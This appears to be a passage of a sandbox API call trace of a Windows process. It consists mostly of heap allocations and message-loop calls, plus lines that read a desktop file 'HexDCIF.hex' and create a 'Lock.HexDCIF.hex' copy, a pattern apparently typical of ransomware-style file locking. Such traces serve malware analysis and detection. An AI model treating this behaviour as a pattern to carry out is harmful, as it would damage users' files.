[0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0159.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0159.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0159.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0159.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0159.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0159.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0159.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0159.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0159.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0159.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0159.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0159.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0159.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0159.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0159.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0159.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0159.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0159.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0159.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0159.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0159.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0159.394] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0159.394] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.394] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0159.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0159.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0159.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0159.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0159.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0159.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0159.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0159.395] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0159.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0159.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0159.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0159.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0159.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0159.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0159.396] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexdcif.hex"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0159.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0159.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0159.634] TranslateMessage (lpMsg=0x8cf708) returned 0 [0159.634] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0159.634] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0159.634] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0159.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0159.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0159.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0159.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0159.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0159.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0159.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0159.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0159.635] 